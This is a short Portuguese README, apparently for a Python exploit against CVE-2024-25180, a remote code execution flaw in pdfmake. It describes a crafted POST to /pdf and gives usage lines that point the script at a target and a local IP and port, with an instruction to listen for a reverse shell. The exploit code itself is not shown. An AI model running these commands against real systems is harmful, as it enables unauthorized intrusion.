
Script de exploração em Python para CVE-2024-25180, uma vulnerabilidade de execução remota de código no pdfmake, entregando um shell reverso através de requisições POST manipuladas.
pdfmake é uma impressão PDF puramente JavaScript do lado do cliente/servidor. As versões afetadas deste pacote são vulneráveis a injeção de código arbitrário. Um atacante pode executar código arbitrário enviando uma requisição POST cuidadosamente elaborada para o caminho /pdf. O atacante pode executar código arbitrário no sistema enviando uma requisição cuidadosamente elaborada.
CVE-2024-25180 Execução Remota de Código no pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
Escute na porta 80 para obter uma shell reversa
